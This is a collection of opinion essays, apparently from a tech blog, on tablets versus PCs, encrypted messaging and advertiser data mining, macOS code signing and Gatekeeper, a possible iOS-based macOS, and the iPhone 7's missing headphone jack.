Pity the poor personal computer. Its time is swiftly coming to a close, eclipsed by its progeny, the tablet. Hampered by legacy architecture and legacy operating systems, the PC will soon fade away from desks at home and in offices. Instead, PCs will live out of sight and out of mind, stacked to the rafters in server closets and data centers. An dignified end for a technology that changed the world.
Well, let’s not be too hasty. Steve Jobs’s famous metaphor about trucks and cars from the iPad introduction is an apt way of thinking about tablets and PCs, but only so much. In the intervening years, tablets have gained capabilities on par (light) trucks such as in the case of the iPad Pro. During the same time, PCs have become more car-like as in the single-port retina MacBook. And that’s muddied the waters plenty without even getting into the world of convertible hybrid tablets, Windows 10, and Chromebooks.
I’ll put myself in the camp that laptop/tablet hybrids are a short-term solution until the tablet and PC divide fully shakes out. The dividing line will be drawn when we establish the things a traditional personal computer can do that a tablet can’t—and vice versa. There’s some clear lines now: you can’t develop applications on an iPad for the most part, though this is certainly going to change. You can’t do heavy graphics work, or anything more complicated than the most basic audio and video editing, but this is only for now.
More difficult to change is how tablets are locked to themselves. You can’t use a tablet with an external display, except to do a presentation. There are limited options for input and output, as well. Latency and transmission speeds for wireless connections will improve with time, but for now, anything that must be real time for input or output is hampered. What wireless solutions we have now for the tablet to escape itself are kludges and hacks.
As tablets get more powerful, they will expand to allow you to do what you can do on your traditional PC. In tandem, PCs will become more powerful too. A PC, even in a laptop form factor, has more headroom for computing power. This goes for both size of chips, but also thermal headroom. Nobody wants a tablet with a cooling fan, after all. The increased computing headroom of the personal computer opens it up to all kinds of new applications that will, in time, trickle down to a tablet in time for the personal computer to have more applications that require more power.
It’s better to think of the tablet as a sort of computing appliance. You buy it, and it serves its purpose of giving you the best of basic personal computing. When it gets old, and unsupported, you replace it. You could do this in the PC world, but it’s easier just to upgrade the components. That’s impossible on a tablet without a soldering iron, specialized components, and a lot of patience. Some bemoan the loss of upgradability, and we see it coming to the PC too, as they become more “car”-like. I’m not sure it’s such a bad thing.
How many of the problems that plagued PCs back in the day were a result of the componentized nature of the platform? Stick a bad RAM stick in your PC and watch things go sideways real fast. I know for a fact that part of why Windows is such a pain, even today, is that it needs to support a nearly infinite number of hardware configurations. Not everything will work well together. Upgradability of a PC’s components is nice and convenient, but opens up so much potential for hassle. Better to just plug stuff in without opening the case. At least there’s less possibility for things to go wrong. A point for the tablet, but also for the tablet-ified PC.
But why do you need more power right there at your fingertips, anyway? What about the Cloud? Who needs a computer at your desk, when the tablet (or ultra-portable PC) can offload its storage, processing power, and whatnot off to some box somewhere in a data center? We’re closer to making this a reality than we ever had been in the when Larry Ellison proposed his Network Computer, but connectivity is the enemy again. American broadband is still crap, and it’s crap in a lot of other countries too. Unless getting data to and from that remote machine is as fast as on a local one, this idea is stuck.
Though the biggest obstacle to tablets is the entrenched culture of the personal computer in workplaces. Yes, there are some progressive companies that are integrating tablets into daily work life, but existing limitations mean that your average workplace isn’t going to be able to swap out everyone’s laptop with a tablet any time soon. This goes double for desktops. There are those who suggest that once the children of the tablet age, whose first computing experience was an iPad or iPhone, enter the workplace, they’ll have to migrate to tablets. Not at all the case.
Kids growing up into a workplace IT culture built around PCs is not enough to shake things up. As anecdata, I know most kids in my age bracket, at least in the US, grew up with Macintoshes in their schools as the primary computers. (Hell, my middle school had Apple IIs in the computer lab until I was in 8th Grade.) Macs are making more penetration in the office, but of the six jobs I had after graduating college, only two of them were a primarily Macintosh IT environment. Both were tech jobs. If a whole generation of kids weaned on the Macintosh couldn’t get Macs on desks at your average workplace, what makes you think kids raised on tablets will?
None of this is to say that a tablet-first future isn’t coming. There needs to be something compelling enough to disrupt the entrenched legacy of the personal computer at home and at work. Tablets will get there first in the home. They already provide an easier way for people to do most of the ordinary computing tasks they would do on a PC. A few more iterations and OS upgrade cycles, and the tablet will be your average user’s primary computing device. The office, not so much.
For the time being, the PC will rule the desk. That is, unless you fit a specific niche where you can live within a tablet’s limitations. Over time, yes, the tablet’s limits will fall away, and tablets will let you do more, with more. We’re not there yet, and I don’t see it happening for at least a decade. The thin edge of the tablet wedge has gotten in, however. Its only a matter of time. Just don’t assume your next traditional computer will be your last.
There’s tension when it comes to technology companies and encrypted messaging. Snowden’s revelations about PRISM and other NSA spying through tech companies have them promising more encryption to protect their public image. Yet, if they use good encryption that governments can’t get their tendrils into, and if they do it by default, there’s other people who can’t spy in on people’s conversations: the companies themselves.
If Facebook is encrypting users conversations, they can’t mine data for its uses. That includes stuff like the News Feed algorithm, their digital assistant M, and—biggest of all—the data they sell to advertisers. That last one directly affects the company’s bottom line. It’s the same with Google, Microsoft, Snapchat, and any other advertising supported company that isn’t end-to-end encrypting messages by default. Whatever claims they want to make about valuing user privacy, and all that jazz, as long as they’re peeking into what you’re saying and doing, your conversations aren’t private. End of story.
Even with encrypted messaging, the provider does have to store something to make it work. Signal, which is end-to-end encrypted revealed that the FBI subpoenaed their user data. Of which they don’t have much: “only account creation date & last login time.” according to Edward Snowden. Apple, too, logs some user data, such as who you messaged and when, but not the content.
In the case of Apple, this is the sort of metadata that the NSA claims to have collected on phone calls. It’s still dangerous if it gets out—or subpoenaed—but it’s not great for marketing purposes. Advertisers are less interested in who you’re talking to, and more about what you’re talking about. This is why chatbots are so sinister. By presenting a friendly, playful personality that promises to do whatever you ask it to, chatbots are excellent tools for extracting your personal data. And what better way to get a good deal on a partnership with a company to integrate with your chatbot than promising to share valuable user data with them?
Messaging, even when you’re not talking about anything “important” is a gateway into our most intimate selves. That’s why that data is so precious to the NSA, to other governments, and to advertisers. By presenting a messaging service as private and secure, even when it’s not by default, a tech company can override yet another defense mechanism savvy users know to keep prying eyes out of their lives. Even worse, most ordinary users aren’t going to even know or care, as long as the service does what they want, and does it well.
This is what everyone is banking on. Without education about the potential of mass data collection by private companies and government agencies alike, most people won’t be aware of the risks. Without a compelling narrative about why people should care, education about the risks will just be ignored. We all have something to hide, not necessarily illegal things, but aspects of ourselves we want to keep between us and the human being on the other end of the line. If we can’t keep people from prying into this most intimate space of our digital lives, what will convince them to butt out?
The dream of personal computing is unfettered access and control of powerful hardware that you can make do anything your little heart desires. The reality of personal computing, at least in the internet age, is that you and everyone with a connection has barely fettered access and control of your hardware. I don’t know if you can still plug a Windows XP machine into the Internet without a malware filter and have it turn into part of a botnet overnight, but it sure was that way for a while. I wouldn’t dare stick even a modern Windows 10 machine on the open web without something to protect it.
When anything can be accessed, when there are countless people: individuals, businesses, and states, all poking and prodding to find any possible weakness in the software and hardware we use, something has to give. In the case of Apple, it’s the freedom to run any random app on your iOS devices. Apple vets what is allowed to run on your iPhone and iPad, and it takes modifying the core software to change that. The big fear among some is that this will, eventually, come to the Mac. And this will be the end of days for free, open, personal computing. Hence concern over recent changes to Gatekeeper, the macOS tool for ensuring software is safe, that make it harder to run unsigned apps.
What code signing does is allow a user to know the app in question is being created and distributed by a developer that has, bare minimum, coughed up $99 a year for an Apple Developer Account. The intention is not necessarily a money grab, but a security measure so that Apple, and the user, can know if an app has been modified and identify the author.
It’s not perfect, by any stretch. The BitTorrent client Transmission got malware injected into it, and their code signing key compromised. Twice. If the purpose of code signing is a trust measure to confirm that an app you download and install off the open web is safe, this is a failure, although likely a failure on the Transmission team.
Code signing is also inconvenient. If you don’t have $99 a year to get your Apple Developer ID, you’re stuck up a creek with an unsigned app that is now harder for your potential audience to use. For open source apps, this is a huge pain in the behind, since someone now needs to serve as benefactor if they want a signed Mac version. Not every open source project will want or be able to afford that.
Yet, nearly five-hundred words in, I can’t say I’m terribly upset by this development for the reasons I brought up at the start. Free, unfettered, open computing is dangerous as hell. Being able to arbitrarily execute any piece of code that lands on your computer is a massive risk, and we’ve seen what happens when there’s no protection. If you need a reminder, go spin up an unpatched Windows XP VM or two.
Let’s face it. Users are idiots. All users. Even you and me. Even the top computer security experts, whether they’re working for Apple or the NSA, are liable to do something very stupid when they have to make a decision to keep their computers safe. Hell, case in point, some NSA operative left a powerful hacking tool on a server where it was compromised. What makes you think that you, smart and savvy computer user, won’t accidentally install a compromised executable and turn your machine into part of a botnet?
Restricting the average user’s ability to run random software is, as painful as it might sound, for their safety. It’s protection not just from malicious actors, of which there are many, but protection from their own idiocy. There’s no way to allow a computer to run arbitrary code and protect a user from the consequences thereof. With so much of our lives entangled in a garbage web of privacy, not preemptively locking things down is downright stupid.
Conversely, it should be possible for a user to open those locks. It shouldn’t be easy, it shouldn’t be obvious, and it should require them to absolve their OS provider of choice from responsibility if—or when—something blows up in their face. Digital security is doomed to be a cat-and-mouse game for eternity. That doesn’t mean we should make it easier for the cats in the interest of… what, exactly? The average person does not want to think about how to protect themselves, they just want their stuff to work.
That needs to be the priority: keep everyone safe, and keep everyone running. You can do this without crushing the freedom to make software, even free software. It’s valid to quibble about Apple making their $99/year Developer Program mandatory for developers who just want to make and distribute an app, too. Despite that, a system that offers a signing certificate to anyone with a pulse isn’t going to be secure either. We’re doomed no matter what, but a solution that keeps the user as safe as possible for as long as possible is the best option we have.
So, the chip in the new iPhone is faster than any MacBook Air. The pure silicon power in the A10 is fueling another round of speculation about whether iOS will come to the desktop. It was something floated as an idea here and there for the past few years, but it’s faded into the background as iOS gains more Mac features, and macOS gains more iOS features. Personally, I don’t think iOS will come to the Mac any time soon. What I think will happen is something a bit more radical: a new version of macOS built with the underpinnings of iOS instead.
It’s not as crazy as it sounds. If you recall the original iPhone announcement, Steve Jobs didn’t say the iPhone ran iPhone OS, he said it ran OS X. It’s not exactly OS X, but iOS and macOS have the same technology at the core. iOS also serves as the underpinnings of Apple’s other two operating systems: watchOS and tvOS. Thinking about iOS this way, you can see the development of iOS as stripped-down, mobile and touch optimized version of macOS. In the past decade, it’s been built back up with modern, touch and mobile-focused computing as its focus.
Every version of iOS since the initial release has added new features and extensibility of the type we take for granted in modern desktop OSes. Yes, iOS isn’t at the point where has feature parity with the Mac on an OS level by any measure. It’s not unreasonable to assume that with a few more years of development time that iOS will reach parity with modern macOS. One example of this future is the upcoming Apple File System which is planned to run on all Apple devices. That’s some serious unification.
If the pattern holds, I expect to see a new version of macOS built on the iOS code base, optimizing for desktop features, and possibly even running on ARM chips. There’s almost certainly an ARM version of macOS as know it today running on ARM, but if Apple can jettison the same legacy crap they let go for iOS on the Mac, I don’t see why they wouldn’t. How many of the issues we deal with in on the Mac (not related to outdated hardware) are from fifteen years of accumulated cruft? Or longer, if you count the baggage from the NeXTSTEP days.
None of this is going to happen for a while. We’re only a decade out from the last processor transition in Macintosh hardware. While the Intel transition was pretty seamless, a transition to ARM Macs will bring one major hassle: the loss of Windows compatibility. Perhaps if an A15X chip of some sort is powerful enough to do real-time CPU emulation without a huge speed crunch, it won’t be an issue. Or, maybe, Windows for ARM will become a thing again. Either way, it’ll be a hell of a transition. Apple’s done it twice before, though. I’m excited to see what a desktop OS built on iOS would work like, even if it still looks like macOS. And I’d put safe money down that it will.
The furor over the iPhone 7’s headphone jack, or lack thereof, seems to be fading. It was doomed to be a non-issue anyway, so I’m not surprised. This is, in part, because Apple was so far out in front of the reveal, and because it’s a minor inconvenience at worst. Charging and listening via wired gear at the same time is still a concern, but solutions will come down the pike for that. Just wait a month or two, or join us happy Bluetooth headphone users in the wonderful world of wireless listening. You don’t even need $160 AirPods to do it.
But there’s still some cause for concern with the removal of the headphone jack. It’s just not the concerns I hear a lot of people screaming about. While I’d need to see a teardown to be certain, evidence suggests that the Lightning to 3.5mm Headphone Jack Adapter is about as passive as you can get with a Lightning dongle. It probably consists of a Lightning adapter chip, a Digital to Analog Converter, and an Analog to Digital Converter for the microphone on your headset. Square has already come out and said their old 3.5mm headphone jack-based card reader works with the dongle. Other devices that input audio via that jack should work fine, albeit in mono. 
I’ve heard some people float the idea that there could be a DRM lockout in future iPhones, or future versions of the dongle, to prevent unauthorized devices. That’s not likely giving how the headphone jack works. As long as there’s conversion of digital to analog along the path to the speakers, there’s a way to tap it. Even high-resolution, 192k/24-bit audio can be output over 3.5mm, as long as it’s stereo. The PonoPlayer doesn’t have any fancy outputs, just two standard 3.5mm jacks, one amplified and one not. Perhaps there might be a kill switch not to allow output via the Lightning to 3.5mm Adapter, but why? It could easily be bypassed with a third-party adapter, and all Lightning headphones would have a DAC in them anyway. You’d block legit users and potential pirates alike.
Any potential DRM risk is around other audio formats beyond stereo output. Let us imagine a future where Apple Music provides 5.1 surround sound audio. This is a bit preposterous on the face of it, but work with me. While there are “5.1” headphones, they connect over USB, since you can’t output 5.1 sound through the headphone jack. You can, however, output 5.1 through an optical audio port, and most modern Macs combine optical audio and 3.5mm phone jacks, via the Mini-TOSLINK optical audio connector. The hardware overhead of optical audio, however, makes me doubt there will ever be a Lightning-to-Mini-TOSLINK Adapter.
If you want to listen to 5.1 audio out of your iPhone, you’ll have to hook it to something via Lightning. It would be, at least theoretically, possible to capture each channel of the 5.1 signal after it passes through the DAC, but that’s a lot of work for minimal gain. Plus, I have my doubts Apple will ever bother with 5.1 audio on the iPhone or iPad. If streaming and wireless are the future of audio, bandwidth is too constrained to make high-fidelity and 5.1 worthwhile for the near-future. More importantly, most consumers don’t give two shits about high-fidelity audio or surround sound anyway.
So, I’m not worried about a DRM lockout in a headphone jack-free iPhone ecosystem. Unless Apple decides that you can’t connect any old DAC to a Lightning port, or forces everything to go over Bluetooth or a proprietary wireless method, we’ll be in good shape. When it comes to portable devices and audio, the future is wireless, at least for listening. As long as there’s a supported way to get audio out and audio in—which Lightning supports—over wires, things are going to be okay.
This is a limit the headphone jacks have on all iPhones. The TRRS standard commonly used on smartphones has only four contacts: left audio, right audio, ground, and microphone. ↩